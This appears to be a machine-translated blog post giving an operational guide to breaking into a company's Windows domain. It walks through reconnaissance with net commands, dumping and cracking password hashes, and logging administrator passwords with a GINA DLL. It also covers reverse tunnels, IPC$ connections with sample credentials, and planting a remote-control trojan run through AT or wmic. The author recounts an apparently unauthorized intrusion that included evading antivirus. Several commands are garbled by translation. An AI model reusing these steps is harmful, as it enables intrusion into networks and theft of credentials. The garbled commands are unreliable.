Domain penetration knowledge

A popular image analysis domain user logs on to DC, hoping to help users who are new to Active Directory
 
 
Lan Penetration Process
1. Collect information.
1-1. no matter how the Intranet machine is obtained, after determining whether the machine is in the internal network, we need to first understand the personnel of the machine. If our goal is the company, then we need to know the position of this person in the company, his identity, his rights, and his permissions on the Intranet. As a large company, a person with high permissions needs to use many things in the internal network. Therefore, the permissions of a person with high permissions will be much higher than that of ordinary employees, this is common in my Penetration Process.
Now that he has his machine, it is necessary to flip over his computer. If you say how to flip it, you can try to get familiar with his computer, or even better than him, then you can learn more about it. A personal computer, from which some information related to his own, and a large amount of company information should be no problem, unless it is a new computer.
1-2. after learning a certain amount of personnel information, you need to write down the important data such as your account and password, which will be useful in the future. Therefore, before you infiltrate, you may wish to create a notebook to save important information. Writing a notebook won't waste much time. Next, we should have a certain understanding of this network. Is it a general Intranet or a domain? Generally, a large company uses a domain. We only need to check it and find out that to penetrate into it, you must understand its network extension. Of course, we cannot understand things that are too specific physically. We can only understand what we know. Whether it's INT, DMZ, or LAN, we have to be familiar with it. Here, we will use some commands, and we believe everyone should be familiar with them.
Ipconfig/all queries some situations of the local machine. The IP segment gateway does not belong to the domain.
Net view to query some associated machines, which are usually displayed in the machine name. We need to PING the IP addresses of these machines. One is to facilitate the query of the IP addresses of important machines, and the other is to facilitate the query of several segments.
Net view/domain query has several domains, because there are generally more than one domain in a large network
Net group/domain query groups in the domain
Net user/domain query domain users
Net group "domain admins"/domain query domain management user groups
These are all things we need to know. Of course, sometimes we need to query some more information. You will find them under the NET command. I don't need to repeat them. The specific situation is analyzed in detail.
 
2. Information archiving www.2cto.com
2-1. With the information, we need to archive the information to a certain extent and archive the IP corresponding to each machine name, so that the information will not be messy during convenience.
2-2. The queried user, Administrator, must be archived.
2-3. Useful information that may appear when querying information must be archived.
3. Technical Utilization
3-1. Whether it is through a keyboard record. For HASH capturing, We need to store all the key data in the account, password, and email address. On the one hand, we need to prepare the information for penetration, and on the other hand, prevent the current attackers from dropping the data.
3-1-1. Uses remote control key records for capturing.
3-1-2. Use PWDUMP7 or GETHASHES to capture the HASH and then crack it. After GETHASHES V1.4, you can capture all the HASH values of the domain.
3-1-3. Use GINASTUB. DLL to obtain the Administrator's account and password. Because the domain administrator has the permission to log on to any machine. The password is easy to record. After INSTALL, a faxmode. INC file record password is generated under SYSYTEM32.
3-2. With the Intranet, there are a lot of things that we do not need to operate directly on the current machine. Although others are in the Intranet, it does not mean that they do not have a defense system. Therefore, it is necessary to set up SOCKS or VPN. I believe everyone will do it.
3-2-1. I recommend VIDC, which is very convenient. Run VIDC. EXE-D-P PORT in CMD.
3-2-2. Use LCX on the server and LCX. EXE-SLAVE server ip port 127.0.0.1 PORT under CMD, and then go to the server and cmd lcx. EXE-LISTEN Server ip port arbitrary PORT.
3-2-3. After SOCKS is created, you can use SOCKSCAP locally to connect to SOCKS. After a successful connection, you can perform this operation on your own.
Basically, we can only operate so much, and there is no technical reuse or exploitation in the future. However, there are a lot of experience in this process, and there are also a lot of details to deal.
What if we get an intranet machine that has a domain but does not use a domain account? Then we can only query or do everything we can to get his usual account password, then use this account password, and then enter the domain through SOCKS. In this case, it is necessary for your peers to view and control machine files, as well as record passwords, GINA, and HASH cracking.
What should we do after entering the domain, and what should we do after SOCKS is created. We can throw S to check the main port. We can try a weak password on the port. We can detect the Intranet WEB in many ways, you can even use MS08-067 to break through another machine, but believe me, most of the machines that can use domain are patched. We can use very little, but cannot be discouraged. As long as we can shuttle through the Intranet, we will at least be much easier in defense. What we need is patience and time.
Once we have a password, we can try the IPC connection and directly win the domain. It depends on how much permission you have.
Net use // IP/ipc $ password/user: username @ domain
We recommend that you enter your account and password in this way. Why? If there is a space in the user name, It will be safer if you lose. What domain users cannot have spaces?
Yes, I used to think no, nor did Microsoft's lecturers say no. However, after my tests and experience, it is false. The domain can be completely blank, except for the user name, user na me still exists. If you don't believe it, try it.
After the IPC is created, you just want to COPY the file, rarfile, or stallion, which is your freedom.
Afterwards: recently, due to the penetration of the domain, some problems occurred during the Penetration Process. Several times I did not know how to proceed. In fact, there is no technical obstacle. The main reason is that the other party has a strong primary defense, and my remote control was unable to execute CMD at first. After several days of environment testing, it broke through CMD. With CMD, I made a query and obtained some information, and then began to penetrate down. I did not run the password of the controlled machine, I flipped through his files and pulled out his common password. Because he does not use a domain account, he logs in as a system account, so he cannot view the domain. I can only use his domain account to establish an IPC connection, find a WEB service on the Intranet, and penetrate it into it to win a stable Intranet machine.
After I took the Intranet WEB server, I was completely in the DOMAIN and didn't use hash injection. I first queried DOMAIN ADMINS and found that the account on the WEB server belongs to this group, PW and then get the HASH, and I even went to the domain control server's IPC $.
Connected to IPC $, directly threw a remote control under its SYSYTEM32, and then started it with the AT command. During this period, I tried five shifts, but after SHIFT was disabled, my remote control will also fall, so it is more convenient to use AT to add new job if this method is ruled out.
Remote control is provided to the domain control server. CMD is used to GETHASHES all the HASHES for cracking. Fortunately, the users in the file management group are found, and the goal behind me is achieved.
In general, this penetration is a good luck, and there are not too many troubles in the middle. However, it took me half a month to spend most of my time in testing the defense environment and eliminating software sales, trojan-free, search for information above.
Later, I obtained his network extension diagram and found that the region I stayed in was just a small domain, and there were several other domains that I did not involve. In front of the domain was DMZ, the front of DMZ is of course INT.
It was very late. I was writing a detailed Penetration Process. However, because I have been working for a long time, I cannot record many details on the spot. Therefore, I can write something I can think of on the BLOG for the time being, if there is time for the environment, more details will be added, as well as the image and the troubles encountered during penetration, and how to solve the problems.
Bytes ----------------------------------------------------------------------------------------------
Common commands
Net view
View the list of computers in the same domain/Workgroup
Net view/domain
View the domain/Workgroup list
Net view/domain: Secwing
View the computer list in the Secwing domain
Net group/domain
View the group of the Region
Net user/domain
View users in the region
Net user/domain zerosoul 12345678
To change the domain user password, you need the domain administrator permission, or press Ctrl + Alt + Del to modify the password.
Net localgroup administrators SECWING/zerosoul/add
The user in the Users domain must be added to the local Administrators Group.
The following command can only be used for domain controllers:
Net group "Domain controllers"
View domain controllers (if multiple controllers exist)
Net group
View domain groups
Net group "domain admins"
View Domain administrators
Net group "domain users"
View Domain administrators
PS: Open the command of the domain controller Configuration Wizard
Dcpromo
Psexec/accepteula bypasses the first verification window
Mstsc/admin solves the problem that the hash cannot be captured.
Wmic/node: 172.16.19.96/user: ABIMAQ/Administrator/password: k78m90 process call create c:/kav/2009.exe
Export xec.exe-s-u administrator-p k78m90 // 172.16.16.2-c:/kav/2009.exe copy the file and execute
Unzip xec.exe-s-u administrator-p km3104i // 172.16.16.2-c:/kav/gsecdump.exe-u capture hash
Net use // 172.16.16.2/IPC $ "k78m90"/user: "admintitrator"
Net use // 172.16.16.2/IPC $ "k78m90"/user: "aABIMAQ/Administrator"
Net time // 172.16.16.2
At // 172.16.16.2 2009.exe
Java export hclient fdc1.cnhan.com http 80/admin/export H. aspx using H connection command
[CreateTunnel] 1234: 127.0.0.1: 3389 port redirection command
Iam-alt-h user-hash is injected into the hash.
Whosthere-alt.exe to see if the injection was successful